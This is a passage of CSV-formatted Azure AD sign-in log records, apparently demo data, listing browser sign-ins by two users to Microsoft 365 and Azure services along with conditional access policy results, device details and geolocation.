Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,cbffb959-9fbe-4abe-95ed-0d85414a1300,SigninLogs,Sucess,41.90428925,-85.99833679
+2074,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,22:18.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,f5ca49d8-69e0-46c5-a3b4-a6795f6ed2a3,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office 365 Exchange Online,00000002-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 15:22,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",c95450b3-582d-4306-9dd2-9bda9fbe1200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 Exchange Online,c95450b3-582d-4306-9dd2-9bda9fbe1200,SigninLogs,Sucess,41.90428925,-85.99833679
+2075,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,22:21.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,b500a884-ff38-4cbe-aa8c-090eacd13fc3,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:22,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",c95450b3-582d-4306-9dd2-9bda12bf1200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,c95450b3-582d-4306-9dd2-9bda12bf1200,SigninLogs,Sucess,41.90428925,-85.99833679
+2076,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,46:25.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5b66d511-dc02-4721-9110-2a1269fa58f6,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 15:46,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",3f80e775-4028-4bc5-9e8b-649b16541100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,3f80e775-4028-4bc5-9e8b-649b16541100,SigninLogs,Sucess,41.90428925,-85.99833679
+2077,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,23:19.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,bc346f60-9fee-43c0-bb2e-d42e0fac0cf9,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft Office Web Apps Service,67e3df25-268a-4324-a550-0de1c7f97287,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}]",notApplied,08/04/2020 15:23,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",9303d935-cf24-489a-bd00-a11c085b1200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,9303d935-cf24-489a-bd00-a11c085b1200,SigninLogs,Sucess,33.7984581,-84.38828278
+2078,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,46:02.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,a5e416c8-0072-4b38-8efc-34a8b92520fb,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office Online Client AAD- Loki,b23dd4db-9142-4734-867f-3577f640ad0c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:46,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",1f656d90-8802-4e53-aa2e-7546e92c1100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft People Cards Service,1f656d90-8802-4e53-aa2e-7546e92c1100,SigninLogs,Sucess,33.7984581,-84.38828278
+2079,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,46:47.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,c24008bf-4edf-47c8-abae-7da0e33531db,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:46,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",5f11d930-41ca-43a7-b362-f3ce4cf01100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,5f11d930-41ca-43a7-b362-f3ce4cf01100,SigninLogs,Sucess,33.7984581,-84.38828278
+2080,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,46:23.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,56c49178-9a3a-4b23-8842-1acc3d1dca89,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:46,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",aa9828f4-3e2d-42fa-acbc-edb928a51400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,aa9828f4-3e2d-42fa-acbc-edb928a51400,SigninLogs,Sucess,41.90428925,-85.99833679
+2081,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,44:32.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,877a5de0-f73f-4617-b3b7-df7619999073,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:44,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",93ca542e-4eab-45c4-8608-b71540061300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,93ca542e-4eab-45c4-8608-b71540061300,SigninLogs,Sucess,41.90428925,-85.99833679
+2082,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,46:22.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,0565250d-3028-4fcd-a922-60ff26d22827,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 